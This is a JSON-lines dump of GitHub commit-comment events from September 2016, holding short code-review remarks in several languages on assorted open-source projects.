{"id":"4512004247","type":"CommitCommentEvent","actor":{"login":"th3w4y"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18889784,"position":52,"line":87,"path":"pokemongo_bot/api_wrapper.py","commit_id":"97d02acde575c84f539b6ab8cd7ec132fbf32c58","created_at":"2016-09-03T11:02:26Z","updated_at":"2016-09-03T11:02:26Z","body":"Why this huge horizontal_accuracy?"}},"created_at":"2016-09-03T11:02:26Z"}
{"id":"4512006544","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18889786,"position":null,"line":null,"path":null,"commit_id":"9ada5542c359db68a701a845e1e1c1bb30fe96b6","created_at":"2016-09-03T11:04:40Z","updated_at":"2016-09-03T11:04:40Z","body":"CM 14.0 sources are in staging state so I cannot compile it (without errors). But, I successfully compiled AOSP 7.0 sources without errors. But, again, I am to lazy to test it so I cannot tell you :D"}},"created_at":"2016-09-03T11:04:40Z"}
{"id":"4512009859","type":"CommitCommentEvent","actor":{"login":"wilsonge"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":18889793,"position":null,"line":null,"path":null,"commit_id":"12b097918b852af0d92b888185844a5417858f6c","created_at":"2016-09-03T11:07:36Z","updated_at":"2016-09-03T11:07:36Z","body":"https://github.com/joomla/joomla-cms/pull/11892"}},"created_at":"2016-09-03T11:07:36Z"}
{"id":"4512015379","type":"CommitCommentEvent","actor":{"login":"dngreenst"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18889802,"position":null,"line":null,"path":null,"commit_id":"473473d305901249bc7c5a99980239cf0c271c6c","created_at":"2016-09-03T11:12:39Z","updated_at":"2016-09-03T11:12:39Z","body":"Done a test with the trace results and the cleanup function - didn't see a way in which the cleanup messes it up. Back to the drawing board."}},"created_at":"2016-09-03T11:12:39Z"}
{"id":"4512016366","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18889804,"position":null,"line":null,"path":null,"commit_id":"1f749d9eee9e7f508d450b6ea209448d3a04d024","created_at":"2016-09-03T11:13:39Z","updated_at":"2016-09-03T11:13:39Z","body":"Could use with and give a user friendly message I guess. A short timeout is probably sane if the default is too high (I don't know :)"}},"created_at":"2016-09-03T11:13:39Z"}
{"id":"4512016914","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":18889806,"position":null,"line":null,"path":null,"commit_id":"340b8e447e859d2d9f39230393a55745c045d848","created_at":"2016-09-03T11:14:12Z","updated_at":"2016-09-03T11:14:12Z","body":"It looks like the claim \"History tables are more useful with long tc as they are filled more easily\" is probably a myth http://tests.stockfishchess.org/tests/view/57c8969a0ebc59030fbe4cec"}},"created_at":"2016-09-03T11:14:12Z"}
{"id":"4512019991","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18889808,"position":null,"line":null,"path":null,"commit_id":"0d368ef1a2f72b4133f69ddbb4cd3ff82d9742ca","created_at":"2016-09-03T11:17:06Z","updated_at":"2016-09-03T11:17:06Z","body":"I don't know what to do about this. I haven't been able to build locally since the change and the Jenkins build has failed ever since. Now TravisCI also started failing with the change. What do you suggest to do?"}},"created_at":"2016-09-03T11:17:06Z"}
{"id":"4512023249","type":"CommitCommentEvent","actor":{"login":"jotes"},"repo":{"name":"mozilla/pontoon"},"payload":{"comment":{"id":18889813,"position":null,"line":null,"path":null,"commit_id":"8c8fd318dc9519b8295347bff751ee21b519e316","created_at":"2016-09-03T11:20:12Z","updated_at":"2016-09-03T11:20:12Z","body":":+1: "}},"created_at":"2016-09-03T11:20:12Z"}
{"id":"4512023845","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889814,"position":82,"line":82,"path":"src/pocketmine/level/generator/structure/PieceLayoutBuilder.php","commit_id":"3d7da60bb0ebe996de5f55a4b308d3c7bedce814","created_at":"2016-09-03T11:20:40Z","updated_at":"2016-09-03T11:20:40Z","body":"😂 "}},"created_at":"2016-09-03T11:20:40Z"}
{"id":"4512025178","type":"CommitCommentEvent","actor":{"login":"kongwonkeun"},"repo":{"name":"kongwonkeun/sorynory"},"payload":{"comment":{"id":18889815,"position":null,"line":null,"path":null,"commit_id":"b91e3d02c7aa71cbb2e39986b8b10d948bb2f6ca","created_at":"2016-09-03T11:21:59Z","updated_at":"2016-09-03T11:21:59Z","body":"file changed"}},"created_at":"2016-09-03T11:21:59Z"}
{"id":"4512025809","type":"CommitCommentEvent","actor":{"login":"ingvard"},"repo":{"name":"dialekz/TelephoneStation"},"payload":{"comment":{"id":18889816,"position":21,"line":23,"path":"src/main/java/models/User.java","commit_id":"d4ff4472cfe4e3ea344533175a92d59fb52733cd","created_at":"2016-09-03T11:22:37Z","updated_at":"2016-09-03T11:22:37Z","body":"😙  хм, зачем так сделано? Это позволяет создать невалидную бизнес сущность пользователя с пустым именем, которое еще поменять потом нельзя."}},"created_at":"2016-09-03T11:22:37Z"}
{"id":"4512026164","type":"CommitCommentEvent","actor":{"login":"ingvard"},"repo":{"name":"dialekz/TelephoneStation"},"payload":{"comment":{"id":18889817,"position":4,"line":9,"path":"src/main/java/models/User.java","commit_id":"d4ff4472cfe4e3ea344533175a92d59fb52733cd","created_at":"2016-09-03T11:22:59Z","updated_at":"2016-09-03T11:22:59Z","body":"Зачем это тут?"}},"created_at":"2016-09-03T11:22:59Z"}
{"id":"4512026537","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889818,"position":12,"line":12,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:23:22Z","updated_at":"2016-09-03T11:23:22Z","body":"Dlaczego podwójne wcięcie? "}},"created_at":"2016-09-03T11:23:22Z"}
{"id":"4512026962","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889819,"position":8,"line":8,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:23:45Z","updated_at":"2016-09-03T11:23:45Z","body":"Nie potrzebujesz aż tylu komentarzy, niektóre są oczywiste. ;)"}},"created_at":"2016-09-03T11:23:45Z"}
{"id":"4512027006","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889820,"position":2,"line":51,"path":"routes/documents/index.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T11:23:48Z","updated_at":"2016-09-03T11:23:48Z","body":"В смысле сохранение информации о том, какой универ факультет и тд?\r\nЕсли да, то наверное лучше будет вынести это в работы с профилем"}},"created_at":"2016-09-03T11:23:48Z"}
{"id":"4512027739","type":"CommitCommentEvent","actor":{"login":"Tricky1975"},"repo":{"name":"TrickyGameTools/LAURA2"},"payload":{"comment":{"id":18889822,"position":null,"line":null,"path":null,"commit_id":"c812032b2c483bb92bd5b9e319cd97f47874790f","created_at":"2016-09-03T11:24:30Z","updated_at":"2016-09-03T11:24:30Z","body":"Please ignore the assembly files. There were created by the BlitzMax compiler and I made a few errors in the github update scripts, so they ended up here. I've done another commit to prevent this from happening in the future, and they have also been removed from this repository. ;)"}},"created_at":"2016-09-03T11:24:30Z"}
{"id":"4512027817","type":"CommitCommentEvent","actor":{"login":"Zilvereyes"},"repo":{"name":"mangosone/server"},"payload":{"comment":{"id":18889823,"position":null,"line":null,"path":null,"commit_id":"ba217c7a5f3df19209dffbcab8cced3ba9b4899f","created_at":"2016-09-03T11:24:35Z","updated_at":"2016-09-03T11:24:35Z","body":"@billy1arm, want me to rewrite the commit back to utilizing the prior \".ticket command line\"?"}},"created_at":"2016-09-03T11:24:35Z"}
{"id":"4512028081","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889825,"position":15,"line":15,"path":"routes/documents/handlers/getComments.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T11:24:52Z","updated_at":"2016-09-03T11:24:52Z","body":"А, да. Там все нормально будет)"}},"created_at":"2016-09-03T11:24:52Z"}
{"id":"4512028280","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889826,"position":25,"line":24,"path":"Lesson_8/classes/carrige/cargo_carrige.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:25:04Z","updated_at":"2016-09-03T11:25:04Z","body":"На самом деле, иногда длинная (не слишком длинная, конечно) строка читается лучше. Например, если и так понятно что присходит: вывод текста с интерполяцией, иногда проще написать в одну строку, потому что при разбиении строки на две логика всё равно остаётся на уровне одной строки и мозгу приходится склеивать эти две строки воедино."}},"created_at":"2016-09-03T11:25:04Z"}
{"id":"4512028361","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889827,"position":15,"line":15,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T11:25:09Z","updated_at":"2016-09-03T11:25:09Z","body":"да, такой ответ должен быть"}},"created_at":"2016-09-03T11:25:09Z"}
{"id":"4512028864","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889830,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T11:25:36Z","updated_at":"2016-09-03T11:25:36Z","body":"при добавлении или при отдаче клиенту?"}},"created_at":"2016-09-03T11:25:36Z"}
{"id":"4512029002","type":"CommitCommentEvent","actor":{"login":"liborm85"},"repo":{"name":"Sean-Der/pecl-networking-ssh2"},"payload":{"comment":{"id":18889831,"position":null,"line":null,"path":null,"commit_id":"6057018d3765d99e116f67f3c1b2e761a8f87bf2","created_at":"2016-09-03T11:25:43Z","updated_at":"2016-09-03T11:25:43Z","body":"Hi @Sean-Der. Is there any chance that TODOs and bugs will be corrected and everything is completed? Now I have a problem with bug when I using two connections by wrapper (  https://bugs.php.net/bug.php?id=72988 )."}},"created_at":"2016-09-03T11:25:43Z"}
{"id":"4512029040","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889832,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T11:25:45Z","updated_at":"2016-09-03T11:25:45Z","body":"при добавлении не надо, только id"}},"created_at":"2016-09-03T11:25:45Z"}
{"id":"4512029282","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889834,"position":9,"line":9,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:26:01Z","updated_at":"2016-09-03T11:26:01Z","body":"Staraj się deklarować wszystkie zmienne na początku funkcji. Ewentualnie użyj w tym miejscu let zamiast var aby utworzyć zmienną o zasięgu blokowym. "}},"created_at":"2016-09-03T11:26:01Z"}
{"id":"4512029286","type":"CommitCommentEvent","actor":{"login":"AFTERM4TH"},"repo":{"name":"AFTERM4TH/hello-world"},"payload":{"comment":{"id":18889835,"position":null,"line":null,"path":null,"commit_id":"3cb62ed598d1bf2b10ef52879c5fc722a5309122","created_at":"2016-09-03T11:26:02Z","updated_at":"2016-09-03T11:26:02Z","body":"#hello-world\r\nHi there\r\nThis is my first time on GitHub"}},"created_at":"2016-09-03T11:26:02Z"}
{"id":"4512029435","type":"CommitCommentEvent","actor":{"login":"emilsvennesson"},"repo":{"name":"emilsvennesson/kodi-espnplayer"},"payload":{"comment":{"id":18889836,"position":null,"line":null,"path":null,"commit_id":"74a57e18f48a4987b87626b90372a5148b8faed6","created_at":"2016-09-03T11:26:12Z","updated_at":"2016-09-03T11:26:12Z","body":"@aqw Oh, I thought all GPL versions were compatible with each other. I'll make sure to keep an eye out for this in the future. Sorry for (accidentally) violating the license.\r\n\r\n@aqw @BaumSchorle: Thanks a lot! :)"}},"created_at":"2016-09-03T11:26:12Z"}
{"id":"4512030107","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889837,"position":10,"line":11,"path":"Lesson_8/classes/carrige/carrige.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:26:49Z","updated_at":"2016-09-03T11:26:49Z","body":"Если бы это была переменная экземпляра и присваивание ей значения происходило бы не в конструкторе, полезно в конструкторе её тоже объявить чтобы было понятно что объект такими данными в принципе может обладать.\r\n\r\nЗдесь у нас локальная переменная, поэтому всё правильно."}},"created_at":"2016-09-03T11:26:49Z"}
{"id":"4512030678","type":"CommitCommentEvent","actor":{"login":"danhedron"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":18889838,"position":36,"line":299,"path":"rwgame/RWGame.cpp","commit_id":"5f860037589ddf2a751cad2940ce612af1845ba4","created_at":"2016-09-03T11:27:23Z","updated_at":"2016-09-03T11:27:23Z","body":"Should this be an if? The German cheat is currently the default"}},"created_at":"2016-09-03T11:27:23Z"}
{"id":"4512030877","type":"CommitCommentEvent","actor":{"login":"Hacker432-Y550"},"repo":{"name":"Hacker432-Y550/android_device_huawei_y550"},"payload":{"comment":{"id":18889839,"position":null,"line":null,"path":null,"commit_id":"19846ebe91502a38c6b24c8659d1a770bb6bebb4","created_at":"2016-09-03T11:27:37Z","updated_at":"2016-09-03T11:27:37Z","body":"No thanks I prefer to not follow Blefish commits...in fact I decided to take cherry device tree and vendors as base. It has been very easy to make the ROM full working for y550.\n\nAnyway, all works now"}},"created_at":"2016-09-03T11:27:37Z"}
{"id":"4512032099","type":"CommitCommentEvent","actor":{"login":"Souler"},"repo":{"name":"saby-echo/gulp-elasticbeanstalk-deploy"},"payload":{"comment":{"id":18889841,"position":6,"line":27,"path":"src/aws.js","commit_id":"1a46cab3e615052ae2e1566863582a70d53e3a5f","created_at":"2016-09-03T11:28:48Z","updated_at":"2016-09-03T11:28:48Z","body":"Could you please explain a little further on why this is necessary? I would gladly accept a PR explaining the reason behind this :)"}},"created_at":"2016-09-03T11:28:48Z"}
{"id":"4512032329","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889843,"position":10,"line":10,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:29:01Z","updated_at":"2016-09-03T11:29:01Z","body":"Jeśli zmienisz długość wordDataBase to ten kod może przestać działać jeśli zapomnisz zmienić deklarację randomNumber, użyj wordDataBase.length przy generowaniu randomNumber."}},"created_at":"2016-09-03T11:29:01Z"}
{"id":"4512032465","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php-ds/extension"},"payload":{"comment":{"id":18889844,"position":7,"line":136,"path":"src/ds/ds_htable.c","commit_id":"36b5151c91f34f92bd145e7c2fd105a5ad445966","created_at":"2016-09-03T11:29:08Z","updated_at":"2016-09-03T11:29:08Z","body":"Empty function intentional?"}},"created_at":"2016-09-03T11:29:08Z"}
{"id":"4512032810","type":"CommitCommentEvent","actor":{"login":"zeffii"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":18889846,"position":null,"line":null,"path":null,"commit_id":"1f749d9eee9e7f508d450b6ea209448d3a04d024","created_at":"2016-09-03T11:29:28Z","updated_at":"2016-09-03T11:29:28Z","body":"i think possibly the versions `3.1 < python < 3.3` had some compile variations with respect to win32 / win62 /  posix.  By all reports it should be `read()` now , else users will tell us.. "}},"created_at":"2016-09-03T11:29:28Z"}
{"id":"4512034573","type":"CommitCommentEvent","actor":{"login":"ingvard"},"repo":{"name":"dialekz/TelephoneStation"},"payload":{"comment":{"id":18889848,"position":26,"line":32,"path":"src/main/java/dao/ServiceDao.java","commit_id":"6e8ce755fceb47a9b73adc096aaa552ca3a3b92b","created_at":"2016-09-03T11:31:02Z","updated_at":"2016-09-03T11:31:02Z","body":"Интерфейс даошника не должен заниматься мапинга, к тому же ты тут завизался на resultSet"}},"created_at":"2016-09-03T11:31:02Z"}
{"id":"4512034591","type":"CommitCommentEvent","actor":{"login":"TuttiFrutti159"},"repo":{"name":"Ludeon/RimWorld-de"},"payload":{"comment":{"id":18889849,"position":null,"line":null,"path":null,"commit_id":"1d6acab87d33736b45d4bd9c8de6d2465c350ef8","created_at":"2016-09-03T11:31:03Z","updated_at":"2016-09-03T11:31:03Z","body":"Grammatical corrections"}},"created_at":"2016-09-03T11:31:03Z"}
{"id":"4512034625","type":"CommitCommentEvent","actor":{"login":"TimSchumi"},"repo":{"name":"MoKee/android_device_xiaomi_msm8660-common"},"payload":{"comment":{"id":18889850,"position":121,"line":121,"path":"include/linux/pkt_sched.h","commit_id":"fe399c8827b5739666835b28e3414bf32b982c80","created_at":"2016-09-03T11:31:05Z","updated_at":"2016-09-03T11:31:05Z","body":"Afaik, the type of enable_flow should be __u8, not integer"}},"created_at":"2016-09-03T11:31:05Z"}
{"id":"4512035863","type":"CommitCommentEvent","actor":{"login":"alex011235"},"repo":{"name":"alex011235/FaceSwap"},"payload":{"comment":{"id":18889851,"position":null,"line":null,"path":null,"commit_id":"bbd2d6e05015f4f15a27461770e5778f3c4abf07","created_at":"2016-09-03T11:32:15Z","updated_at":"2016-09-03T11:32:15Z","body":"I'm going to take a look at that later.\nBut I think you're missing the OpenCV libraries.\n\n//Alex\n\n2016-09-01 14:21 GMT+02:00 sardarwaqas <notifications@github.com>:\n\n> i download this app and run but it give error on System.loadLibrary(\"\n> nativefaceswap\");\n> can you tell me reason .E/AndroidRuntime: FATAL EXCEPTION: main\n> Process: com.tzutalin.dlibtest, PID: 27204\n> java.lang.UnsatisfiedLinkError: dlopen failed: cannot locate symbol\n> \"__aeabi_memmove4\" referenced by \"/data/app/com.tzutalin.\n> dlibtest-1/lib/arm/libnativefaceswap.so\"...\n> at java.lang.Runtime.loadLibrary(Runtime.java:372)\n> at java.lang.System.loadLibrary(System.java:1076)\n> at com.alex.faceswap.FaceSwap.(FaceSwap.java:53)\n> at com.alex.faceswap.ActivitySelfieSwap$1.run(ActivitySelfieSwap.java:171)\n> at android.os.Handler.handleCallback(Handler.java:739)\n> at android.os.Handler.dispatchMessage(Handler.java:95)\n> at android.os.Looper.loop(Looper.java:148)\n> at android.app.ActivityThread.main(ActivityThread.java:5417)\n> at java.lang.reflect.Method.invoke(Native Method)\n> at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(\n> ZygoteInit.java:726)\n> at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:616)\n> 09-01 17:06:25.469 27204-27204/com.tzutalin.dlibtest I/Process: Sending\n> signal. PID: 27204 SIG: 9\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/alex011235/FaceSwap/commit/bbd2d6e05015f4f15a27461770e5778f3c4abf07#commitcomment-18862835>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJeSGN5jqH7Pn07qhfwh3fJEhIH2_Xkoks5qlsMugaJpZM4JyoKz>\n> .\n>\n"}},"created_at":"2016-09-03T11:32:15Z"}
{"id":"4512036591","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":18889852,"position":36,"line":299,"path":"rwgame/RWGame.cpp","commit_id":"5f860037589ddf2a751cad2940ce612af1845ba4","created_at":"2016-09-03T11:32:59Z","updated_at":"2016-09-03T11:32:59Z","body":"idk.. it's really just a reminder that we have to respect this in the future.\r\nI should probably change it to `#if` though. - it's a nit though."}},"created_at":"2016-09-03T11:32:59Z"}
{"id":"4512036940","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":18889853,"position":87,"line":350,"path":"rwgame/RWGame.cpp","commit_id":"5f860037589ddf2a751cad2940ce612af1845ba4","created_at":"2016-09-03T11:33:22Z","updated_at":"2016-09-03T11:33:22Z","body":"same as `_GERMAN` check"}},"created_at":"2016-09-03T11:33:22Z"}
{"id":"4512037071","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889854,"position":250,"line":198,"path":"Lesson_8/classes/interface/interface.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:33:28Z","updated_at":"2016-09-03T11:33:28Z","body":"По идее, этот фрагмент должен выглядеть так: `@trains.each_with_index { |train, index| train.print_info(index) }`\r\n\r\nХотя номер поезда по идее должен быть внутри самого объекта поезда? Тогда ещё проще: `@trains.each_with_index { |train| puts train }`. Это будет работать потому что `puts` если получает в качестве аргумента не строку, то автоматически у аргумента вызывает метод `to_s`. То есть всё что нам нужно это определить метод `to_s` в классе `Train`."}},"created_at":"2016-09-03T11:33:28Z"}
{"id":"4512037256","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889855,"position":260,"line":206,"path":"Lesson_8/classes/interface/interface.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:33:41Z","updated_at":"2016-09-03T11:33:41Z","body":"То же что и в комментарии выше."}},"created_at":"2016-09-03T11:33:41Z"}
{"id":"4512037465","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889857,"position":20,"line":20,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:33:55Z","updated_at":"2016-09-03T11:33:55Z","body":"Ta nazwa zmiennej niewiele mi mówi..."}},"created_at":"2016-09-03T11:33:55Z"}
{"id":"4512037623","type":"CommitCommentEvent","actor":{"login":"ingvard"},"repo":{"name":"dialekz/TelephoneStation"},"payload":{"comment":{"id":18889858,"position":12,"line":12,"path":"src/main/java/dao/Dao.java","commit_id":"36476f7dd781236bdfa59fa065765fa782bb4a89","created_at":"2016-09-03T11:34:04Z","updated_at":"2016-09-03T11:34:04Z","body":"Это Дао, который не дао если ты делаешь в каждом методе имплементирующейм этот файл crud сделать тут джейнерик <T> -> Create(T), Update(T), T findBy() и т п."}},"created_at":"2016-09-03T11:34:04Z"}
{"id":"4512037639","type":"CommitCommentEvent","actor":{"login":"JayFoxRox"},"repo":{"name":"rwengine/openrw"},"payload":{"comment":{"id":18889859,"position":147,"line":410,"path":"rwgame/RWGame.cpp","commit_id":"5f860037589ddf2a751cad2940ce612af1845ba4","created_at":"2016-09-03T11:34:05Z","updated_at":"2016-09-03T11:34:05Z","body":"Apparently this was broken pre GTA3 1.1. Should add a todo to investiage"}},"created_at":"2016-09-03T11:34:05Z"}
{"id":"4512037836","type":"CommitCommentEvent","actor":{"login":"Hacker432-Y550"},"repo":{"name":"CarlosArriagaCM/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":18889861,"position":null,"line":null,"path":null,"commit_id":"648e35ba7e84d9ab3d159799b648b0c8fe460852","created_at":"2016-09-03T11:34:15Z","updated_at":"2016-09-03T11:34:15Z","body":"I tried to add support time ago without success\nI should try again"}},"created_at":"2016-09-03T11:34:15Z"}
{"id":"4512037941","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889862,"position":27,"line":27,"path":"Lesson_8/classes/route/route.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:34:20Z","updated_at":"2016-09-03T11:34:20Z","body":"Лучше тогда так:\r\n\r\n```ruby\r\nif <condition>\r\n  # Some tricky code\r\nend\r\n```"}},"created_at":"2016-09-03T11:34:20Z"}
{"id":"4512038921","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18889863,"position":null,"line":null,"path":null,"commit_id":"608b13498ef71d7ae0d00eab39f4b3290e878585","created_at":"2016-09-03T11:35:09Z","updated_at":"2016-09-03T11:35:09Z","body":"Thanks Rocky,\r\n\r\nI tried what you suggested."}},"created_at":"2016-09-03T11:35:09Z"}
{"id":"4512039346","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889864,"position":40,"line":37,"path":"Lesson_8/classes/route/route.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:35:31Z","updated_at":"2016-09-03T11:35:31Z","body":"Это я бы точно не стал делить на 2 строки. Можно попросить Rubocop отслеживать строки длиной не 80 символов, а 100, например."}},"created_at":"2016-09-03T11:35:31Z"}
{"id":"4512039363","type":"CommitCommentEvent","actor":{"login":"matthewmorek"},"repo":{"name":"matthewmorek/wfp-jpo-country"},"payload":{"comment":{"id":18889865,"position":23,"line":81,"path":"index.html","commit_id":"7a2154da5b1d77c021e54b781039b17b3f8775f6","created_at":"2016-09-03T11:35:32Z","updated_at":"2016-09-03T11:35:32Z","body":"Headings won't use `h{i}` classes anymore, as they were in conflict with `height` classes, and they were not giving way to be overridden by micro-classes."}},"created_at":"2016-09-03T11:35:32Z"}
{"id":"4512039466","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":18889866,"position":null,"line":null,"path":null,"commit_id":"f1a6db95cc68bac9374b826deb571b5497b098b1","created_at":"2016-09-03T11:35:40Z","updated_at":"2016-09-03T11:35:40Z","body":"![screenshot_20160903-193235](https://cloud.githubusercontent.com/assets/18079988/18224591/9443dc92-71a0-11e6-8156-06cd23ebcbb4.png)\r\n\r\nAfter this commit."}},"created_at":"2016-09-03T11:35:40Z"}
{"id":"4512040288","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889872,"position":48,"line":56,"path":"Lesson_8/classes/train/train.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:36:21Z","updated_at":"2016-09-03T11:36:21Z","body":"Это круто )"}},"created_at":"2016-09-03T11:36:21Z"}
{"id":"4512040469","type":"CommitCommentEvent","actor":{"login":"ingvard"},"repo":{"name":"dialekz/TelephoneStation"},"payload":{"comment":{"id":18889873,"position":9,"line":9,"path":"src/main/java/dao/UserDao.java","commit_id":"36476f7dd781236bdfa59fa065765fa782bb4a89","created_at":"2016-09-03T11:36:31Z","updated_at":"2016-09-03T11:36:31Z","body":"тут будет public interface UserDao extends Dao<User> а методы из Dao, метод executeSQL не нужен, он в датапровайдере внутри реализации, и не смотрит наружу, если хочешь, что бы подобное всё же было. То используй Specification pattern,"}},"created_at":"2016-09-03T11:36:31Z"}
{"id":"4512040619","type":"CommitCommentEvent","actor":{"login":"eclipsegst"},"repo":{"name":"expense-manager/expense-manager"},"payload":{"comment":{"id":18889874,"position":null,"line":null,"path":null,"commit_id":"aa1eff9d1423ecc189a3b13734b6f1ed9ddac2d8","created_at":"2016-09-03T11:36:42Z","updated_at":"2016-09-03T11:36:42Z","body":"Let  merge this commit to last one.\r\n\r\ngit rebase -i HEAD~2\r\n\r\nkeep the first one\r\nsquash the secon one"}},"created_at":"2016-09-03T11:36:42Z"}
{"id":"4512040803","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18889875,"position":null,"line":null,"path":null,"commit_id":"b7e7a133cd06a637698b08c680e3bbd0882d9c6d","created_at":"2016-09-03T11:36:52Z","updated_at":"2016-09-03T11:36:52Z","body":"Indeed.\r\nBut somehow the compiler didn't capture that one.\r\nWill fix it in a new commit"}},"created_at":"2016-09-03T11:36:52Z"}
{"id":"4512040956","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18889876,"position":59,"line":77,"path":"Lesson_8/classes/train/train.rb","commit_id":"93ab698360704a74cad48b2ed0ad2437202aa6d4","created_at":"2016-09-03T11:37:02Z","updated_at":"2016-09-03T11:37:02Z","body":"Лучше так: `@carriages.each { |carriage| puts carriage }`. Метод `to_s` можно не вызвать."}},"created_at":"2016-09-03T11:37:02Z"}
{"id":"4512041213","type":"CommitCommentEvent","actor":{"login":"sin"},"repo":{"name":"pyziunhhc/HangManHead"},"payload":{"comment":{"id":18889878,"position":22,"line":22,"path":"js/hangman.js","commit_id":"9e7b1fcedc2cc160b439842bc539042288c9ea55","created_at":"2016-09-03T11:37:17Z","updated_at":"2016-09-03T11:37:17Z","body":"Wywołanie hideLetters() wewnątrz drawWord() nie jest dobrym pomysłem. Powoduje to, że funkcja drawWord() nie tylko wyświetla słowo, ale zajmuje się także ukryciem liter. Lepiej byłoby najpierw wywołać funkcję hideLetters(), a następnie przekazać wynik do drawWord() jako parametr. "}},"created_at":"2016-09-03T11:37:17Z"}
